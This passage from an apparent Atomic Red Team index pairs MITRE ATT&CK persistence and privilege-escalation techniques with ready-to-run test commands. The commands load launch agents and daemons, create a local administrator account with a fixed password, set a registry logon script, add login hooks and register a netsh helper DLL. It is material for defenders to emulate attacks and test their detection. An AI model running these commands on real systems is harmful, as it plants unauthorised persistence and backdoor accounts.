for each launch-on-demand user agent from the property list (plist) + files found in /System/Library/LaunchAgents, /Library/LaunchAgents, + and $HOME/Library/LaunchAgents (Citation: AppleDocs Launch Agent + Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). 
+ These launch agents have property list files which point to the executables + that will be launched (Citation: OSX.Dok Malware).\n \nAdversaries may install + a new launch agent that can be configured to execute at login by using launchd + or launchctl to load a plist into the appropriate directories (Citation: + Sofacy Komplex Trojan) (Citation: Methods of Mac Malware Persistence). The + agent name may be disguised by using a name from a related operating system + or benign software. Launch Agents are created with user level privileges and + are executed with the privileges of the user when they log in (Citation: OSX + Malware Detection) (Citation: OceanLotus for OS X). They can be set up to + execute when a specific user logs in (in the specific user’s directory structure) + or when any user logs in (which requires administrator privileges)." + id: attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-25T22:11:45.513Z' + created: '2020-01-17T16:10:58.592Z' + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Command: Command Execution' + - 'Service: Service Creation' + - 'Service: Service Modification' + x_mitre_detection: Monitor Launch Agent creation through additional plist files + and utilities such as Objective-See’s KnockKnock application. Launch Agents + also require files on disk for persistence which can also be monitored via + other file monitoring applications. 
+ x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - User + x_mitre_platforms: + - macOS + identifier: T1543.001 + atomic_tests: + - name: Launch Agent + auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 + description: 'Create a plist and execute it + +' + supported_platforms: + - macos + input_arguments: + plist_filename: + description: filename + type: string + default: com.atomicredteam.plist + path_malicious_plist: + description: Name of file to store in cron folder + type: string + default: "$PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist" + dependency_executor_name: bash + dependencies: + - description: 'The shared library must exist on disk at specified location + (#{path_malicious_plist}) + +' + prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; + exit 1; + +' + executor: + name: bash + elevation_required: true + command: | + if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi; + sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename} + sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename} + cleanup: | + sudo launchctl unload ~/Library/LaunchAgents/#{plist_filename} + sudo rm ~/Library/LaunchAgents/#{plist_filename} + T1543.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1543.004 + url: https://attack.mitre.org/techniques/T1543/004 + - external_id: CAPEC-550 + source_name: capec + url: https://capec.mitre.org/data/definitions/550.html + - external_id: CAPEC-551 + source_name: capec + url: https://capec.mitre.org/data/definitions/551.html + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html + description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved + July 10, 2017. 
+ source_name: AppleDocs Launch Agent Daemons + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf + description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical + OS X Malware Detection & Analysis. Retrieved July 10, 2017.' + source_name: OSX Malware Detection + - url: https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf + description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. + Retrieved July 10, 2017.' + source_name: WireLurker + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Launch Daemon + description: "Adversaries may create or modify launch daemons to repeatedly + execute malicious payloads as part of persistence. Per Apple’s developer documentation, + when macOS and OS X boot up, launchd is run to finish system initialization. + This process loads the parameters for each launch-on-demand system-level daemon + from the property list (plist) files found in /System/Library/LaunchDaemons + and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent + Daemons). These LaunchDaemons have property list files which point to the + executables that will be launched (Citation: Methods of Mac Malware Persistence). + \n\nAdversaries may install a new launch daemon that can be configured to + execute at startup by using launchd or launchctl to load a plist into the + appropriate directories (Citation: OSX Malware Detection). The daemon name + may be disguised by using a name from a related operating system or benign + software (Citation: WireLurker). 
Launch Daemons may be created with administrator + privileges, but are executed under root privileges, so an adversary may also + use a service to escalate privileges from administrator to root. \n\nThe plist + file permissions must be root:wheel, but the script or program that it points + to has no such requirement. So, it is possible for poor configurations to + allow an adversary to modify a current Launch Daemon’s executable and gain + persistence or Privilege Escalation. " + id: attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-09-16T15:46:44.130Z' + created: '2020-01-17T19:23:15.227Z' + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Service: Service Creation' + - 'Service: Service Modification' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - root + x_mitre_permissions_required: + - Administrator + x_mitre_detection: 'Monitor for launch daemon creation or modification through + plist files and utilities such as Objective-See''s KnockKnock application. 
' + x_mitre_platforms: + - macOS + identifier: T1543.004 + atomic_tests: + - name: Launch Daemon + auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf + description: 'Utilize LaunchDaemon to launch `Hello World` + +' + supported_platforms: + - macos + input_arguments: + plist_filename: + description: filename + type: string + default: com.atomicredteam.plist + path_malicious_plist: + description: Name of file to store in cron folder + type: string + default: "$PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist" + dependency_executor_name: bash + dependencies: + - description: 'The shared library must exist on disk at specified location + (#{path_malicious_plist}) + +' + prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and + try again."; exit 1; + +' + executor: + name: bash + elevation_required: true + command: | + sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} + sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} + cleanup: | + sudo launchctl unload /Library/LaunchDaemons/#{plist_filename} + sudo rm /Library/LaunchDaemons/#{plist_filename} + T1053.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.004 + url: https://attack.mitre.org/techniques/T1053/004 + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html + description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved + July 10, 2017. + source_name: AppleDocs Launch Agent Daemons + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. 
+ source_name: Methods of Mac Malware Persistence + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Launchd + description: |- + Adversaries may abuse the Launchd daemon to perform task scheduling for initial or recurring execution of malicious code. The launchd daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence). + + An adversary may use the launchd daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. launchd can also be abused to run a process under the context of a specified account. Daemons, such as launchd, run with the permissions of the root user account, and will operate regardless of which user account is logged in. + id: attack-pattern--8faedf87-dceb-4c35-b2a2-7286f59a3bc3 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-23T22:41:14.739Z' + created: '2019-12-03T14:15:27.452Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_remote_support: false + x_mitre_permissions_required: + - root + x_mitre_detection: "Monitor scheduled task creation from common utilities using + command-line invocation. Legitimate scheduled tasks may be created during + installation of new software or through system administration functions. 
Look + for changes to tasks that do not correlate with known software, patch cycles, + etc. \n\nSuspicious program execution through scheduled tasks may show up + as outlier processes that have not been seen before when compared against + historical data. Data and events should not be viewed in isolation, but as + part of a chain of behavior that could lead to other activities, such as network + connections made for Command and Control, learning details about the environment + through Discovery, and Lateral Movement." + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_platforms: + - macOS + identifier: T1053.004 + atomic_tests: + - name: Event Monitor Daemon Persistence + auto_generated_guid: 11979f23-9b9d-482a-9935-6fc9cd022c3e + description: "This test adds persistence via a plist to execute via the macOS + Event Monitor Daemon. \n" + supported_platforms: + - macos + input_arguments: + script_location: + description: evil plist location + type: path + default: "$PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist" + script_destination: + description: Path where to move the evil plist + type: path + default: "/etc/emond.d/rules/atomicredteam_T1053_004.plist" + empty_file: + description: Random name of the empty file used to trigger emond service + type: string + default: randomflag + executor: + name: bash + elevation_required: true + command: | + sudo cp #{script_location} #{script_destination} + sudo touch /private/var/db/emondClients/#{empty_file} + cleanup_command: | + sudo rm #{script_destination} + sudo rm /private/var/db/emondClients/#{empty_file} + T1078.003: + technique: + id: attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2 + description: "Adversaries may obtain and abuse credentials of a local account + as a means of gaining Initial Access, Persistence, Privilege Escalation, or + Defense Evasion. 
Local accounts are those configured by an organization for + use by users, remote support, services, or for administration on a single + system or service.\n\nLocal Accounts may also be abused to elevate privileges + and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). + Password reuse may allow the abuse of local accounts across a set of machines + on a network for the purposes of Privilege Escalation and Lateral Movement. " + name: Local Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1078.003 + url: https://attack.mitre.org/techniques/T1078/003 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2021-04-05T12:51:00.663Z' + created: '2020-03-13T20:26:46.695Z' + x_mitre_platforms: + - Linux + - macOS + - Windows + - Containers + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_detection: Perform regular audits of local system accounts to detect + accounts that may have been created by an adversary for persistence. Look + for suspicious account behavior, such as accounts logged in at odd times or + outside of business hours. 
+ x_mitre_permissions_required: + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + identifier: T1078.003 + atomic_tests: + - name: Create local account with admin priviliges + auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15 + description: After execution the new account will be active and added to the + Administrators group + supported_platforms: + - windows + executor: + command: |- + net user art-test /add + net user art-test Password123! + net localgroup administrators art-test /add + cleanup_command: |- + net localgroup administrators art-test /delete >nul 2>&1 + net user art-test /delete >nul 2>&1 + name: command_prompt + elevation_required: true + T1037.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1037.002 + url: https://attack.mitre.org/techniques/T1037/002 + - url: https://support.apple.com/de-at/HT2420 + description: 'Apple. (2011, June 1). Mac OS X: Creating a login hook. Retrieved + July 17, 2017.' + source_name: creating login hook + - source_name: S1 macOs Persistence + url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/ + description: Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved + March 27, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Logon Script (Mac) + description: "Adversaries may use macOS logon scripts automatically executed + at logon initialization to establish persistence. macOS allows logon scripts + (known as login hooks) to be executed whenever a specific user logs into a + system. 
A login hook tells Mac OS X to execute a certain script when a user + logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), + a login hook executes as the elevated root user.(Citation: creating login + hook)\n\nAdversaries may use these login hooks to maintain persistence on + a single system.(Citation: S1 macOs Persistence) Access to login hook scripts + may allow an adversary to insert additional malicious code. There can only + be one login hook at a time though and depending on the access configuration + of the hooks, either local credentials or an administrator account may be + necessary. " + id: attack-pattern--43ba2b05-cf72-4b6c-8243-03a4aba41ee0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-27T16:49:15.786Z' + created: '2020-01-10T16:01:15.995Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_detection: Monitor logon scripts for unusual access by abnormal users + or at abnormal times. Look for files added or modified by unusual accounts + outside of normal administration duties. Monitor running process for actions + that could be indicative of abnormal programs or executables running upon + logon. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_platforms: + - macOS + identifier: T1037.002 + atomic_tests: + - name: Logon Scripts - Mac + auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 + description: 'Mac logon script + +' + supported_platforms: + - macos + executor: + steps: "1. Create the required plist file\n\n sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist\n\n2. + Populate the plist with the location of your shell script\n\n sudo defaults + write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n\n3. 
+ Create the required plist file in the target user's Preferences directory\n\n\t + \ touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist\n\n4. + Populate the plist with the location of your shell script\n\n\t defaults + write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n" + name: manual + T1037.001: + technique: + id: attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3 + description: "Adversaries may use Windows logon scripts automatically executed + at logon initialization to establish persistence. Windows allows logon scripts + to be run whenever a specific user or group of users log into a system.(Citation: + TechNet Logon Scripts) This is done via adding a path to a script to the HKCU\\Environment\\UserInitMprLogonScript + Registry key.(Citation: Hexacorn Logon Scripts)\n\nAdversaries may use these + scripts to maintain persistence on a single system. Depending on the access + configuration of the logon scripts, either local credentials or an administrator + account may be necessary. " + name: Logon Script (Windows) + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1037.001 + url: https://attack.mitre.org/techniques/T1037/001 + - url: https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx + description: Microsoft. (2005, January 21). Creating logon scripts. Retrieved + April 27, 2016. + source_name: TechNet Logon Scripts + - source_name: Hexacorn Logon Scripts + url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/ + description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part + 18. Retrieved November 15, 2019. 
+ type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-24T23:45:03.153Z' + created: '2020-01-10T03:43:37.211Z' + x_mitre_platforms: + - Windows + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: |- + Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\Environment\UserInitMprLogonScript. + + Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon. + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1037.001 + atomic_tests: + - name: Logon Scripts + auto_generated_guid: d6042746-07d4-4c92-9ad8-e644c114a231 + description: | + Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key + that can be viewed in the Registry Editor. + supported_platforms: + - windows + input_arguments: + script_path: + description: Path to .bat file + type: String + default: "%temp%\\art.bat" + script_command: + description: Command To Execute + type: String + default: echo Art "Logon Script" atomic test was successful. 
>> %USERPROFILE%\desktop\T1037.001-log.txt + executor: + command: | + echo "#{script_command}" > #{script_path} + REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f + cleanup_command: | + REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1 + del #{script_path} >nul 2>&1 + del "%USERPROFILE%\desktop\T1037.001-log.txt" >nul 2>&1 + name: command_prompt + T1134.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1134.003 + url: https://attack.mitre.org/techniques/T1134/003 + - url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing + description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved + April 21, 2017. + source_name: Microsoft Command-line Logging + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Make and Impersonate Token + description: Adversaries may make and impersonate tokens to escalate privileges + and bypass access controls. If an adversary has a username and password but + the user is not logged onto the system, the adversary can then create a logon + session for the user using the LogonUser function. The function + will return a copy of the new session's access token and the adversary can + use SetThreadToken to assign the token to a thread. 
+ id: attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-02-18T18:03:37.481Z' + created: '2020-02-18T18:03:37.481Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - SYSTEM + x_mitre_permissions_required: + - Administrator + - User + x_mitre_defense_bypassed: + - Windows User Account Control + - System access controls + - File system access controls + x_mitre_detection: |- + If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging) + + If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. + + Analysts can also monitor for use of Windows APIs such as LogonUser and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators. 
+ x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Command: Command Execution' + x_mitre_platforms: + - Windows + atomic_tests: [] + T1546.007: + technique: + created: '2020-01-24T14:26:51.207Z' + modified: '2020-03-24T18:28:07.793Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed + description: |- + Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh. + + Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence) + name: Netsh Helper DLL + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1546.007 + url: https://attack.mitre.org/techniques/T1546/007 + - url: https://technet.microsoft.com/library/bb490939.aspx + description: Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017. + source_name: TechNet Netsh + - url: https://github.com/outflankbv/NetshHelperBeacon + description: Smeets, M. (2016, September 26). 
NetshHelperBeacon. Retrieved + February 13, 2017. + source_name: Github Netsh Helper CS Beacon + - url: https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html + description: Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL + DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017. + source_name: Demaske Netsh Persistence + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Matthew Demaske, Adaptforward + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Module: Module Load' + x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes + in most environments. Monitor process executions and investigate any child + processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\SOFTWARE\Microsoft\Netsh + registry key for any new or suspicious entries that do not correlate with + known system files or benign software. 
(Citation: Demaske Netsh Persistence)' + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1546.007 + atomic_tests: + - name: Netsh Helper DLL Registration + auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d + description: 'Netsh interacts with other operating system components using dynamic-link + library (DLL) files + +' + supported_platforms: + - windows + input_arguments: + helper_file: + description: Path to DLL + type: Path + default: C:\Path\file.dll + executor: + command: 'netsh.exe add helper #{helper_file} + +' + name: command_prompt + T1037.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1037.003 + url: https://attack.mitre.org/techniques/T1037/003 + - source_name: Petri Logon Script AD + url: https://www.petri.com/setting-up-logon-script-through-active-directory-users-computers-windows-server-2008 + description: Daniel Petri. (2009, January 8). Setting up a Logon Script through + Active Directory Users and Computers in Windows Server 2008. Retrieved November + 15, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Network Logon Script + description: "Adversaries may use network logon scripts automatically executed + at logon initialization to establish persistence. Network logon scripts can + be assigned using Active Directory or Group Policy Objects.(Citation: Petri + Logon Script AD) These logon scripts run with the privileges of the user they + are assigned to. Depending on the systems within the network, initializing + one of these scripts could apply to more than one or potentially all systems. + \ \n \nAdversaries may use these scripts to maintain persistence on a network. + Depending on the access configuration of the logon scripts, either local credentials + or an administrator account may be necessary." 
+ id: attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-24T23:45:25.625Z' + created: '2020-01-10T18:01:03.666Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_detection: Monitor logon scripts for unusual access by abnormal users + or at abnormal times. Look for files added or modified by unusual accounts + outside of normal administration duties. Monitor running process for actions + that could be indicative of abnormal programs or executables running upon + logon. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Active Directory: Active Directory Object Modification' + x_mitre_platforms: + - Windows + atomic_tests: [] + T1134.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1134.004 + url: https://attack.mitre.org/techniques/T1134/004 + - source_name: DidierStevens SelectMyParent Nov 2009 + url: https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/ + description: 'Stevens, D. (2009, November 22). Quickpost: SelectMyParent or + Playing With the Windows Process Tree. Retrieved June 3, 2019.' + - source_name: Microsoft UAC Nov 2018 + url: https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works + description: Montemayor, D. et al.. (2018, November 15). How User Account + Control works. Retrieved June 3, 2019. + - source_name: CounterCept PPID Spoofing Dec 2018 + url: https://www.countercept.com/blog/detecting-parent-pid-spoofing/ + description: Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved + June 3, 2019. 
+ - source_name: CTD PPID Spoofing Macro Mar 2019 + url: https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/ + description: Tafani-Dereeper, C. (2019, March 12). Building an Office macro + to spoof parent processes and command line arguments. Retrieved June 3, + 2019. + - source_name: XPNSec PPID Nov 2017 + url: https://blog.xpnsec.com/becoming-system/ + description: Chester, A. (2017, November 20). Alternative methods of becoming + SYSTEM. Retrieved June 4, 2019. + - source_name: Microsoft Process Creation Flags May 2018 + url: https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags + description: Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. + Retrieved June 4, 2019. + - description: Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2) + Ataware Ransomware Part 3. Retrieved June 6, 2019. + url: https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3 + source_name: Secuirtyinbits Ataware3 May 2019 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Parent PID Spoofing + description: |- + Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. 
One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018) + + Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) + + Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. 
administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017) + id: attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-02-09T14:11:20.296Z' + created: '2020-02-18T18:22:41.448Z' + x_mitre_contributors: + - Wayne Silva, F-Secure Countercept + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_defense_bypassed: + - Heuristic Detection + - Host forensic analysis + x_mitre_detection: |- + Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018) + + Monitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). 
Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible. + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Process: Process Creation' + - 'Process: Process Metadata' + x_mitre_platforms: + - Windows + identifier: T1134.004 + atomic_tests: + - name: Parent PID Spoofing using PowerShell + auto_generated_guid: '069258f4-2162-46e9-9a25-c9c6c56150d2' + description: | + This test uses PowerShell to replicates how Cobalt Strike does ppid spoofing and masquerade a spawned process. + Upon execution, "Process C:\Program Files\Internet Explorer\iexplore.exe is spawned with pid ####" will be displayed and + calc.exe will be launched. + + Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/PPID-Spoof.ps1) + supported_platforms: + - windows + input_arguments: + parent_process_name: + description: Name of the parent process + type: string + default: explorer + spawnto_process_path: + description: Path of the process to spawn + type: path + default: C:\Program Files\Internet Explorer\iexplore.exe + dll_process_name: + description: Name of the created process from the injected dll + type: string + default: calculator + dll_path: + description: Path of the dll to inject + 